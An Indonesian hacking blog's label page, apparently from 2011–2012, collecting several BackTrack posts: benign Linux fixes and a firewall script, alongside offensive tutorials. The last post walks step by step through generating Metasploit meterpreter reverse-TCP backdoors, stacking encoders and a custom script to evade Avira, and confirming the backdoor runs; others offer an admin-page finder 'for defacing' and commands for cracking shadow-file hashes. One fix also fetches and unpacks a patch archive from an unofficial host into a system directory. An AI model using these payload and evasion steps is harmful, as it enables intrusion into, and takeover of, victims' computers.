Pages

Banner 468 x 60px

 
Tampilkan postingan dengan label BackTrack. Tampilkan semua postingan
Tampilkan postingan dengan label BackTrack. Tampilkan semua postingan

Kamis, 02 Agustus 2012

Installing VMware 8.0.2 On Backtrack 5 R2

0 komentar
Penginstallasian tampaknya baik-baik saja. Sampai akhirnya....


What the fuck? Ok, jangan panik. Segera buka terminal, dan ikuti petunjuk dari saya.
Pastikan kamu menggunakan VMware 8.0.2 dan Kernel 3.2.6. Untuk mengeceknya, kamu bisa menggunakan perintah berikut.

Cek VMware:

Command :
root@red-dragon:~vmware-installer -lProduct Name         Product Version     ==================== ====================vmware-workstation   8.0.2.591240

Cek Kernel

Command :
root@red-dragon:~uname -r3.2.6


Setelah OK. Sekarang pindah ke direktori /usr/lib/vmware/modules dengan perintah

Command :
root@red-dragon:~cd /usr/lib/vmware/modules/root@red-dragon:/usr/lib/vmware/modules/#

Kemudian download file patch vmware dengan perintah

Command :
root@red-dragon:/usr/lib/vmware/modules/wget http://t193r.googlecode.com/files/source.tar.lzma


Extract file dengan perintah

Command :
root@red-dragon:/usr/lib/vmware/modules/tar -vx source.tar.lzma


Kemudian jalankan kembali VMware kamu


You are soooooo
patched by
red-dragon
Read more...

Kamis, 23 Februari 2012

Admin Page Finder [LINUX]

0 komentar
Muter-muter sampe kepala muter 360 derajat, tapi belum menemukan hasil dalam mencari admin page finder untuk linux? Jangan kuatir. Saya akan memberikan anda script perl untuk menemukan halaman administrator dalam proses defacing.
Anda bisa download di sini

Uji keberhasilan script:


Screenshoot


Read more...

Rabu, 22 Februari 2012

[FIX] Connection To BlueZ Failed

0 komentar
Mungkin anda pernah mengalami hal ini ketika anda menginstall bluez.


Berikut cara menyembuhaknnya.



Buka terminal, lalu masukan perintah:


Command:
root@revolution:/# su -

Kemudian


Command:
root@revolution:/# bluetoothd -u


Kemudian jalankan lagi bluez di System - Preferences - Bluetooth Manager


Done. You've got your own bluetooth

created by : red-dragon
Read more...

Selasa, 07 Februari 2012

FireNix, Konfigurasi Network Linux

0 komentar
Beberapa hari ini, saya membuat sebuah script sederhana yang bisa digunakan di semua distro Linux. Script ini berfungsi untuk melakukan setting Firewall berdasarkan IPTables dan ARPTables.

Script ini telah diuji dan sedang dalam pengembangan. Beberapa fitur yang ada dalam script ini adalah:
  1. Memasang firewall dengan konfigurasi yang mendasar
  2. Melakukan reset settingan firewall
  3. Menutup port yang terbuka
  4. Memblokir IP yang diduga sebagai attacker
Keuntungan menggunakan script ini adalah, mempermudah kita dalam mempertahankan diri dari serangan sniffer. Karena, dengan mengaktifkan fungsi firewall pada software ini, IP kamu tidak akan bisa di PING (=

Untuk mendownload, kamu bisa gunakan perintah git:


# git clone https://github.com/blusp10it/FireNix

Lalu jalankan scriptnya dengan perintah:

# bash FireNix

Tampilan FireNix

Memasang FireWall

Mereset Setting FireWall

Mengecek Status FireWall

Memblokir IP Attacker

Cek Port yang Terbuka

Script By

Bye bye (=


Are you blusp10it?
Read more...

Senin, 06 Februari 2012

FIX Ettercap SSL dissection needs a valid 'redir_command_on'

0 komentar
Pengguna backtrack 5 R1 yang sudah menggunakan ettercap, mungkin mengalami masalah ini. Terdapat pesan error ketika ettercap melakukan unified sniffing. Pesan errornya adalah:

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file



Bagaimana mengatasinya?
1. Buka terminal, lalu masukan perintah:

Command:
root@revolution:/# nano /usr/local/etc/etter.conf

Maka anda akan melihat tampilan seperti ini:

Output:
#############################################################################                                                                          ##  ettercap -- etter.conf -- configuration file                            ##                                                                          ##  Copyright (C) ALoR & NaGA                                               ##                                                                          ##  This program is free software; you can redistribute it and/or modify    ##  it under the terms of the GNU General Public License as published by    ##  the Free Software Foundation; either version 2 of the License, or       ##  (at your option) any later version.                                     ##                                                                          ##  $Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $                   ##                                                                          #############################################################################
[privs]ec_uid = 65534                # nobody is the defaultec_gid = 65534                # nobody is the default



2. Mengubah parameter ec_uid dan ec_gid

Perhatikan baris

ec_uid = 65534 dan ec_gid = 65534

Ubah kedua baris ini menjadi

Output:
#############################################################################                                                                          ##  ettercap -- etter.conf -- configuration file                            ##                                                                          ##  Copyright (C) ALoR & NaGA                                               ##                                                                          ##  This program is free software; you can redistribute it and/or modify    ##  it under the terms of the GNU General Public License as published by    ##  the Free Software Foundation; either version 2 of the License, or       ##  (at your option) any later version.                                     ##                                                                          ##  $Id: etter.conf,v 1.79 2005/07/07 10:08:55 alor Exp $                   ##                                                                          #############################################################################
[privs]ec_uid = 0                # nobody is the defaultec_gid = 0                # nobody is the default

Tekan ctrl+x , kemudian tekan y untuk menyimpan. Dan enter untuk menkonfirmasi.

Jalankan kembali ettercap dengan perintah.

Command:
root@revolution:/# ettercap -T -q -i wlan0


Perfect as usual =)

created by : red-dragon
Read more...

Rabu, 01 Februari 2012

FIX hci0 command tx timeout

0 komentar
Biasanya sebelum kita login ke BackTrack, ada peringatan dari DMESG yang isinya:

[138209.666632] usbcore: registered new interface driver btusb
[138214.844410] hci_cmd_task: hci0 command tx timeout
[138219.848340] hci_cmd_task: hci0 command tx timeout
[138224.853676] hci_cmd_task: hci0 command tx timeout
[138229.856417] hci_cmd_task: hci0 command tx timeout
[138234.860719] hci_cmd_task: hci0 command tx timeout
[138239.960585] hci_cmd_task: hci0 command tx timeout
[138240.464277] bluetoothd[5133]: segfault at 3 ip b7e39938 sp bfb8fcc8 error

Ini terjadi karena bluetooth stack driver nggak bisa UP. BackTrack di versi 5 R1memiliki kernel 2.6.39-4 yang tidak mempunyai patch kernel bluetooth. Makanya peringatan:

hci0 command tx timeout

akan selalu ada tiap kali kita booting.


Untuk menghindari hciconfig membawa interface bluetooth ini UP, kita harus memberikan sebuah perintah yang berjalan di level rc. Tambahkan baris:


hciconfig hci0 down


sebelum perintah:


exit 0

Di file:


/etc/rc.local


SCREEN-SHOT



Setelah menambahkan baris tersebut, kita bisa reboot untuk melihat hasilnya (=

blusp10it
Read more...

Sabtu, 14 Januari 2012

Mengkoneksikan WLAN Melalui Terminal

0 komentar
Jangan asal klik! Klak klik klak klik membuat kita jadi manja dan gak mau repot. Saking seringnya nge-klik tanpa tau itu untuk apa, virus sampe dijalankan. Itulah bodohnya user manja para pengguna OS Windows.


Hal ini tidak hanya dialami para pengguna Windows, tapi juga para pengguna Linux yang masih baru, Saking errornya, user root aja masih pakek "sudo", atau teks sampe di-paste ke dalam folder. Hal seperti inilah yang terjadi kalo kita terlalu sering mengandalkan GUI.


Memang ada kalanya GUI itu mempermudah kita dalam mempercepat proses pengerjaan tugas dsb, tapi ada kalanya kita harus mengandalkan CLI ketika dihadapkan pada sebuah basis data yang ada banyak file dan kita harus membuka file tertentu. Sama seperti ingin membuka satu pintu di antara 5000 pintu di ruangan yang sama.


Untuk itu saya akan menjelaskan bagaimana caranya mengkoneksikan WLAN melalui terminal, khusus sistem operasi BackTrack. Tidak ada tools tambahan yang kalian butuhkan. Kalian hanya harus mengetahui:
  1. Nama ESSID
  2. Mac address access point
  3. Password access point (jika ada)
Langkah melakukan koneksi


Ketahui interface yang kalian gunakan
Untuk mengetahuinya, ketikkan pada terminal

Code:
root@blusp10it:~# iwconfigOutputnya kurang lebih seperti ini:


Terlihat dari hasil scan, wlan0 mendapatkan satu access poin, diberi tanda sebagai "Cell 01", dengan spesifikasi mac address = F4:EC:38:C5:5B:CC, dan ESSID = BackTrack, serta tidak dienkripsi.


Konfigurasikan interface wireless sebelum dikoneksikan
Untuk melihat konfigurasi wireless kita, gunakan perintah:

Code:
root@blusp10it:~# iwconfig wlan0



Kemudian, kita tentukan mac address mana yang akan kita koneksikan dengan perintah:
Code:
root@blusp10it:~# iwconfig wlan0 ap [mac-address-access-point]

Lanjut, kita tentukan ESSID-nya dengan perintah:
Code:
root@blusp10it:~# iwconfig wlan0 essid [nama-access-point]
Jika ada enkripsi, masukkan key-nya dengan perintah:
Code:
root@blusp10it:~# iwconfig wlan0 s:"[password]"
Jika password-nya : superstar, maka perintahnya menjadi:
Code:
root@blusp10it:~# iwconfig wlan0 s:"superstar"

Koneksikan wireless interface ke tujuan
Sebelum melakukan koneksi, periksa dulu konfigurasi, apa sudah benar atau masih ada yang salah. Jika sudah barulah kita koneksikan wlan0 ke access point melalui perintah terminal:
Code:
root@blusp10it:~# dhclient wlan0

Jika sudah berhasil, di akhir output akan ada "bound to IP" dimana kamu sudah mendapatkan ip dari proses DHCP. Untuk melihat sukses atau tidaknya koneksi, kita bisa melihat hasil dari perintah:
Code:
root@blusp10it:~# ifconfig wlan0

Sukses!

Created by blusp10it
Read more...

Jumat, 13 Januari 2012

Cracking Shadow File [John+Hashcat]

0 komentar
Shadow file adalah sebuah file yang berisikan informasi dari sebuah sistem operasi Linux, yang memuat:
  1. Username
  2. Salt
  3. Password
  4. User ID
  5. Group ID
  6. Full Name
  7. Home Directory
  8. Login Shell
Tantangan para penterster adalah, file shadow ini dienkripsi dengan sistem BSD 32 bit yang bila sebuah password sepanjang 10 karakter di-bruteforce
akan butuh seribu tahun untuk bisa menemukan kombinasinya. Namun, ada cara yang lebih cepat, yaitu dengan dictionary attack. Dengan dictionary attack, seorang pentester hanya butuh 2 sampai 3 jam saja untuk melakukan peretasan. 


Yang kamu butuhkan:
  1. John The Rripper (sudah ada di BackTrack)
  2. HashCat (sudah ada di BackTrack)
  3. File Shadow (bisa didapatkan di pc Unix kamu sendiri)
  4. Dictionary
Menggunakan JTR
Pertama, sediakan file shadow dan dictionary, kemudian buka terminal,menuju ke /pentest/password/jtr.




Di sini saya mempunyai sebuah file shadow di folder /root/cracking-file-shadow/ bernama "shadow" dan di folder yang sama, saya juga sudah menyediakan sebuah dictionary list bernama "wordlist.lst". Berikut adalah file shadow dan dictionary saya:

SHADOW:

 WORDLIST:

Untuk memulai cracking, kita harus mengetahui cara menggunakan JTR. Dimana:


Usage: john [OPTIONS] [PASSWORD-FILES]


Untuk cracking shadow, tentukan posisi wordlist serta shadow yang akan di crack.


Code:
root@blusp10it:/pentest/passwords/jtr# ./john --wordlist=[FILE] [SHADOW]

Dimana [FILE] adalah dictionary file kamu dan [SHADOW] adalah file shadow kamu.


Code:
root@blusp10it:/pentest/passwords/jtr# ./john --wordlist=/root/cracking-file-shadow/wordlist.lst /root/cracking-file-shadow/shadow


Jika berhasil di-crack:



Menggunakan HashCat
Menggunakan hachcat agak sedikit rumit daripada menggunakan JTR, karena kita harus menentukan tipe enkripsi file itu sendiri, dan harus ada modifikasi sedikit agar hashcat bisa membaca enkripsi shadow.


Penyesuaian:
Jika file shadow kamu seperti ini:


root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::


Hapus yang berwarna merah menjadi:

$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30
Kemudian, save file tersebut:


Jika sudah, kita lakukan cracking dengan perintah umum hashcat


Usage: ./hashcat-cli.bin [options] hashfile [wordfiles|directories]


Di sini, options akan kita gunakan untuk menentukan jenis enkripsi file yang akan kita crack yaitu: MD5(Unix) dengan nomor 500.


Setelah menentukan jenis enkripsi, kita harus menentukan file shadow dan dictionary kita, sehingga perintah akhirnya menjadi:


Code:
root@blusp10it:/pentest/passwords/hashcat# ./hashcat-cli.bin --hash-mode=500 /root/cracking-file-shadow/shadow /root/cracking-file-shadow/wordlist.lst

Jika berhasil di crack, akan seperti ini:




Created by blusp10it
Read more...

Jumat, 16 Desember 2011

[INSANE] Encoding Virus to Bypassing 80% Anti-Virus

0 komentar
CMetasploit dan Anti-Virus. Layaknya air dan minyak, mereka tidak bisa disatukan. Selalu ada cara untuk saling menjatuhkan. Beberapa minggu yang lalu, kita sudah menguji SMADAV dalam menangani backdoor yang dibuat oleh metasploit, dan hasilnya. SMADAV gagal. Ini menjadi pelajaran yang berarti untuk programmer anti-virus lokal, dimana exploitasi bisa terjadi tanpa memanfaatkan vulnerability sebuah OS, atau memanfaatkan celah port 445 yang terbuka.

Pada kesempatan kali ini, kita akan menguji AVIRA. AVIRA bukanlah produk lokal, dan AVIRA menganut system update, dimana database AVIRA selalu diperbaharui untuk mencegah virus baru melewati system pemindaian mereka.

Langsung saja kita menuju tahap pengujian.

Preparation:
Attacker:
1. Metasploit
2. Apache 2

Victim:
1. AVIRA

Goal:
1. Buat payload dengan msfpayload, dan encode dengan msfencode untuk melewati system keamanan AVIRA

Walkthrough:
1. Buka terminal, lalu ubah work directory kita menjadi metasploit directory:

Command :
root@ASUS:~# cd /opt/metasploit/msf3/

Cek msfencode anda. Untuk bantuan, masukan perintah berikut:

Command :
root@ASUS:/opt/metasploit/msf3# ./msfencode -h


Untuk melihat daftar encoder yang dapat digunakan, masukan perintah berikut:

Command :
root@ASUS:/opt/metasploit/msf3# ./msfencode -l



Ok. Pastikan service apache sudah berjalan. Masukan perintah berikut:

Command :
root@ASUS:/opt/metasploit/msf3# /etc/init.d/apache2 start

Catatan:
Setiap payload yang kita buat, akan kita tempatkan pada directory   /var/www. Cobalah untuk menghindari system copy-paste ke VM-ware, mengingat hal ini dapat menyebabkan VM-ware hanging/crash. Lalu bagaimana agar kita dapat menguji payload kita untuk di-scan dengan AVIRA? Mudah saja. VM-ware memiliki interface network khusus bernama vmnet8, dan IP address anda adalah 172.16.60.1. Untuk memperoleh payload, gunakan browser yang tersedia pada VM-ware anda, dalam tutorial kali ini, saya menggunakan browser Mozilla Firefox. Anda juga bisa menggunakan Internet Explorer. Masukan http://172.16.60.1/nama-exploit-anda pada browser untuk memperoleh payload anda.

PAYLOAD 1
Kali ini saya coba dengan payload standar dengan msfpayload, tanpa di-encode menggunakan msfencode.

Command :
root@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 X > /var/www/exploit1.exe


Keterangan:
LHOST = IP address anda
LPORT = PORT Listener anda

Catatan:
Selalu simpan payload kita pada direktori /var/www dan usahakan gunakan nama yang berbeda untuk setiap payload yang kita buat!

Hasil test:

GAGAL

PAYLOAD 2
Kegagalan pertama itu wajar. Mari kita buat payload lain kemudian kita encode dengan msfencode.

Command :
root@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -t exe > /var/www/exploit2.exe

Keterangan:
1. Saya menggunakan encoder x86/shikata_ga_nai, dan melakukan encoding sebanyak 1 kali.


Hasil test:


GAGAL

PAYLOAD 3
Jangan menyerah, kali ini kita akan buat encoder menggila!

Command :
root@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 16 -b '\x00\xff' -t exe > /var/www/exploit3.exe


Hasil:

GAGAL

PAYLOAD 4
Bagaimana jika kita gunakan  2 encoder? Shikata_ga_nai dan jmp_call_additive.

Command :
root@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 4 -b -t raw | ./msfencode -e x86/jmp_call_additive -c 4 -t exe > /var/www/exploit4.exe



Hasil:

GAGAL

PAYLOAD 5
Sekarang kita gunakan 3 encoder. Ini semakin gila [untuk beberapa orang]. Namun bagi saya tidak. =T
Kita akan gunakan Shikata_ga_nai, jmp_call_additive, dan call4_dword-xor.

Command :
root@ASUS:/opt/metasploit/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.60.1 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 4 -b -t raw | ./msfencode -e x86/jmp_call_additive -c 4 -t raw | ./msfencode -e x86/call4_dword_xor -c 4 -t exe > /var/www/exploit5.exe


Hasil:

GAGAL

Kelihatannya anti-virus kita cukup gigih dalam menangani payload yang kita buat. Ok. Sekarang kita coba dengan metode yang agak gila. Dan memang ini gila. Karena kita akan melakukan encoding manual tanpa bantuan msfencode.

Konsep:
Kita akan melakukan encoding payload dengan bahasa pemrograman C.
Kurang lebih seperti ini payout payload kita:

s/+/ /g
s/buf = /unsigned char micro[]=/g
#include <stdio.h>
unsigned char ufs[]=
(( i=1; i<=10000;i++ ))
s/$/"/
s/^/"/
int main(void) { ((void (*)())micro)();}
unsigned char tap[]=
(( i=1; i<=999999;i++ ))
s/$/"/
s/^/"/

Terlihat membingungkan? Jika anda merasa tidak sanggup mengikuti tahap lanjut encoding, jangan tinggalkan halaman ini dulu. Saya akan berikan cara yang jauh lebih mudah ketimbang melakukan encoding cara manual. Saya telah mempersiapkan script untuk melakukan encoding ini. Anda bisa download di sini.

Namun sebelumnya, anda harus mendownload file ini untuk membantu anda dalam melakukan encoding menggunakan bahasa C.

root@ASUS:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Setelah mendownload file vanish.sh, pindahkan file ini ke direktori metasploit, dan ubah modenya agar bisa dieksekusi.

Dalam tutorial kali ini, saya menggunakan vmware, sehingga interface network saya adalah vmnet8. Sekarang saatnya menguji payload kita.

LAST PAYLOAD!

Command :
root@ASUS:/opt/metasploit/msf3# ./vanish.sh



Karena saya menggunakan VM-ware dalam test ini, jadi saya menggunakan interface vmnet8. Jika anda menggunakan modem, maka pilih interface ppp0, jika anda menggunakan wireless network, gunakan interface wlan0, jika anda menggunakan wired connection, gunakan interface eth0.


Gunakan port 4444 sebagai port listener. Port listener bisa anda tentukan sesuka hati, dengan syarat, jangan gunakan port yang sudah digunakan oleh service lain, misalkan port 80 yang digunakan oleh apache. Ini akan mengakibatkan metasploit tidak bisa melakukan listening pada port tersebut.

Untuk jumlah seed, saya menyarankan untuk memasukan angka 7000, dan untuk jumlah encoding, masukan angka 14.

Tunggu sampai proses encoding selesai, hingga muncul tampilan metasploit seperti ini:


Berhasil. Payload kita dibuat dengan nama backdoor.exe pada folder seclabs. Copy payload kita ke direktori /var/www dengan perintah berikut:

Command :
root@ASUS:/opt/metasploit/msf3# cd seclabs/ && cp backdoor.exe /var/www/exploit6.exe

Kemudian kita uji dengan melakukan scanning anti-virus.
Hasil:

BERHASIL

Tidaklah sulit melewati AVIRA. Lalu, apakah file ini berfungsi sebagaimana mestinya? Jalankan saja file tersebut, kemudian cek kembali metasploit kita.


SUKSES

created by:
red-dragon
Read more...
 
Es Sia © 2012 The Cyber Chrome. Supported by Alexa